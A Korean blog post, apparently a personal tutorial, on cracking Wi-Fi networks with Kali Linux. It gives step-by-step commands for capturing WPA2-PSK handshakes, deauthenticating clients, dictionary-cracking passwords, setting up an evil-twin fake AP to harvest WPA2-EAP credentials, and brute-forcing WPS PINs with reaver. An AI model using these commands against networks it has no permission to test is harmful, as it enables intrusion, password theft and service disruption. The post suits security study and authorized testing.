Kali Linux를 이용한 무선 네트워크 해킹

Kali Linux를 이용한 무선 네트워크 해킹 

 

[2.4g/5g 가능 무선 랜카드]

무선 네트워크 트래픽을 캡쳐하기 위해서는 Monitor Mode가 가능한 무선 랜카드가 필요하다. 또한, 이 무선 랜카드를 Kali Linux에 인식시키기 위해서는 Kali Linux에 수동으로 드라이버를  설치 해주어야 한다. iptime A2000Ua은 2.4g 대역과 5g 대역 모두 가능한 제품이다. 이 외에도 다양한 제품이 존재한다.

# git clone https://github.com/aircrack-ng/rtl8812au //드라이버 다운로드 URL

# cd rtl8812au

# sudo make

# sudo make install

# modprobe -a rtl8812au

 

[WPA2-PSK Crack]
일반적인 무선 네트워크 AP들은 WPA2-PSK 방식을 사용한다. 해당 방식을 사용하는 AP를 패스워드를 크랙하기 위해서는 사용자가 AP에 접속할 때 주고 받는 인증 트래픽(4 way handshake)을 캡쳐하여 Dictionary Attack이나 Bruteforce Attack을 진행하여야 한다.

그러나 한 번 인증을 진행한 사용자들은 추가적인 인증을 하지 않기 때문에 인증 트래픽(4 way handshake)이 캡쳐되지 않을 수 있다. 이럴 때는 사용자의 인증을 해제하여 인증을 다시 시도하게 하는 방법을 사용할 수 있다. Kali Linux에는 무선 네트워크 해킹에 필요한 툴들이 기본적으로 설치되어 있다. 툴 사용방법은 아래와 같다.

 

# airmon-ng start [interface]     // 무선랜카드를 Monitor Mode로 변경
# airodump-ng [interface]        // 주변에서 통신중인 무선 네트워크 트랙픽 캡쳐
# airodump-ng --bssid [target APs BSSID] -c [channel] -w [filename] [interface] 
// 주변에서 통신중인 무선 네트워크 트랙픽 중에서 공격하고자 하는 AP를 특정하여 트래픽 저장
# aireplay-ng --deauth 100 -a [target APs BSSID] [interface]
// target AP에 DOS 공격 시도(인증해제)
# aircrack-ng [packe dump file] -w [dictionary file] //dictionary attack 시도

 

[airodump 5g 패킷 캡쳐 명령어]

5G 대역에서만 통신하는 AP의 무선 네트워크 트래픽을 캡쳐하기 위해서는 --band a 옵션을 추가해주어야 한다.

#  airodump-ng --band a [wlan device] 

 

[WPA2-EAP Crack]

무선 네트워크를 이용하는 기업의 경우 WPA2-EAP 방식을 사용하기도 한다. WPA2-EAP 방식의 경우에는 WPA2-PSK 방식보다 까다롭다. FakeAP를 생성하여 사용자의 접속을 유도하고 접속 시도한 사용자 정보를 통해 Dictionary Attack 이나 Bruteforce Attack 을 진행하여야 한다. WPA2_PSK 방식과 같이 타겟 AP에 DOS 공격을 시도하여 이름이 유사한 FakeAP 접속을 유도할 수 있으나, 기업의 경우 잠깐 네트워크 통신이 마비되어도 막대한 손실이 발생할 수 있다.

해당 툴의 자세한 사용 방법은 https://teckk2.github.io/wifi%20pentesting/2018/08/09/Cracking-WPA-WPA2-Enterprise.html에 설명되어 있다.

# apt-get install hostapd-wpe
# vi /etc/hostapd-wpe/hostapd-wpe.conf // ssid 를 target AP의 ssid와 유사하게 변경 
# cat [dictionary file] | asleap -C [Challenge] -R [Response] -W- 

 

 

[PMKID를 이용한 WPA2-PSK crack]

최근 새로운 방식의 WPA2-PSK 공격 방식의 발견되었다고 한다. PMKID를 이용한 방식인데 기존의 방식과 다르게 4 way handshake 패킷을 캡쳐할 필요가 없다고 한다. 직접 시도해보았지만 PMKID를 캡쳐하지는 못했다. 찾아본 바로는 로밍 기능이 활성화된 네트워크에서만 가능하다고 한다.

자세한 공격 방법은
https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-passwords-using-new-pmkid-hashcat-attack-0189379/에 설명되어 있다.

 

 

[WPS 기능 활성화 장비]

안전한 인증 방식과 안전한 패스워드를 사용하고 있더라도 WPS 기능이 활성화되어 있을 경우, 8자리(1자리 체크섬)의 PIN을 이용하여 인증하므로 Bruteforce 공격으로 단기간 내 크랙 가능하다. reaver 라는 툴을 사용하여 Bruteforce 공격을 진행할 수 있다.

#airmon-ng start [device]
# airodump-ng [device] --wps  // wps 기능 활성화 장비 표시
# reaver -i [device] -b [BSSID] -vv

 

References:
[1]https://teckk2.github.io/wifi%20pentesting/2018/08/09/Cracking-WPA-WPA2-Enterprise.html   
[2]https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-passwords-using-new-pmkid-hashcat-attack-0189379/
TAGS.

Comments